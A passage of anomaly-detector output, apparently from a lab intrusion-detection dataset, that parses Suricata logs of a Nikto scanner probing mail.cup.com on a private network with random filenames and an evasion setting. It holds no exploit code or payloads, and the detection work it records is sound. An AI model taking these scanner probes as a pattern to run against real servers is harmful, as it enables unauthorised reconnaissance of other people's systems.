"/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46956, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":776469941489987,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 776469941489987, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.365913+0000\",\"flow_id\":776469941489987,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.367902 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46958 -> 192.168.10.154:80", "/parser/model/time": 1583349514.367902, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46958, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.367902 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46958 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.et", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.368167+0000\",\"flow_id\":829521377532493,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.368167, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":829521377532493,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.et\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.et\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.et", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.et", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46958, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":829521377532493,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 829521377532493, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.368167+0000\",\"flow_id\":829521377532493,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.370560 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46960 -> 192.168.10.154:80", "/parser/model/time": 1583349514.37056, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46960, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.370560 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46960 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cmd", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.370766+0000\",\"flow_id\":380826144121724,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.370766, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":380826144121724,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cmd\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cmd\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cmd", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cmd", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46960, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":380826144121724,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 380826144121724, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.370766+0000\",\"flow_id\":380826144121724,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.372779 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46962 -> 192.168.10.154:80", "/parser/model/time": 1583349514.372779, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46962, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.372779 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46962 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.x-shop", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.373160+0000\",\"flow_id\":319004384865496,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.37316, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":319004384865496,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 